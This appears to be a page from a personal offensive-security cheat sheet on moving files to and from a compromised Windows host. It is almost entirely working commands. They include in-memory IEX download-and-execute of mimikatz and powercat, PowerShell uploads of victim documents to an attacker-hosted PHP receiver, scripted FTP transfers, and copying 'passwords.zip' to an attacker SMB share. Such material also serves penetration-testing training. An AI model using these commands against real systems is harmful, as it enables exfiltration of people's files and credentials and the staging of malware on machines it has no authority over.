🥷
Offensive Security
  • Shells and stuffs
    • Bind Shell
    • Reverse Shell
    • TTY Shell
    • File Transfer
    • Handmade Network Scan
  • Services enumeration
    • DNS Enumeration
    • SMB Enumeration
    • NFS Enumeration
  • Linux Privilege Escalation
    • Useful Tools
    • Hijack X11 session
    • Linux capabilities
    • LXC membership
  • Windows Privilege Escalation
    • Useful Tools
  • Password Attacks
    • Build Wordlist
    • Network Service Attacks
    • Password Cracking
  • Active Directory
    • AD CS
  • OSINT
    • Google Dorks
Powered by GitBook
On this page
  • Powershell
  • Download file
  • Upload file
  • Powercat
  • Send local file
  • Receive remote file
  • FTP
  • Download file
  • Upload file
  • SMB Share (via Impacket)
  1. Shells and stuffs

File Transfer

Powershell

Download file

For this example, first start a web service on the server side. To do so, run the following command in the directory containing the file(s) to be downloaded: 

python3 -m http.server 80

With writing on disk

(new-object System.Net.WebClient).DownloadFile('http://<Attacker IP>/wget.exe','C:\Users\<user>\Desktop\wget.exe')

Without saving on disk

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<Attacker IP>/mimikatz.exe')

Upload file

First, start a PHP web server (apache or nginx) on the attacker machine. Then, create an upload.php file on this web server:

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

Do not forger to create a specific repository for uploaded files:

sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads

Finally, on the Windows host from which you want to upload a file, invoke the upload file method:

C:\Users\victim> powershell (New-Object System.Net.WebClient).UploadFile('http://<Attacker IP>/upload.php', 'important.docx')

Powercat

Powercat is a powershell function which can be useful to establish remote shell, to generate payloads, to create network relays, or to transfer files. First, load the function before you can execute it.

If the machine has access to the Internet, you can download and load Powercat as follows: 

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Send local file 

powercat -c <remote IP> -p <remote Port> -i <Input file path>

Receive remote file

powercat -l -p <local Port> -of <Output file path>

FTP

For both of the following examples, an FTP server has to be start on the attacker machine.

Download file

From a Windows command prompt, execute the following instructions:

C:\Users\victim> echo open <Attacker IP> 21> ftp.txt
C:\Users\victim> echo USER <username> <password> >> ftp.txt
C:\Users\victim> echo binary >> ftp.txt
C:\Users\victim> echo GET <file> >> ftp.txt
C:\Users\victim> echo bye >> ftp.txt
C:\Users\victim> ftp -v -n -s:ftp.txt
C:\Users\victim> del ftp.txt

The previous operation can also be done with a one liner command:

C:\Users\victim> echo open <Attacker IP> 21> ftp.txt
 & echo USER <username> <password> >> ftp.txt & echo binary >> ftp.txt & echo GET <file> >> ftp.txt & echo bye >> ftp.txt & ftp -n -v -s:ftp.txt & del ftp.txt

Upload file

To upload a file via FTP, the procedure is similar to that presented for downloading. Instead of using the GET command, simply replace it with the PUT command with the path of the local file to be uploaded.

SMB Share (via Impacket)

On the attacker machine, start an SMB server. It can be done via Impacket as follows:

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-smbserver share .                               
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Then, on the remote host, mount this network share and copy local files on this share. 

C:\>net use * \\<Attacker IP>\share
Drive Z: is now connected to \\<Attacker IP>\share.

C:\>copy passwords.zip Z:\
PreviousTTY ShellNextHandmade Network Scan

Last updated 2 years ago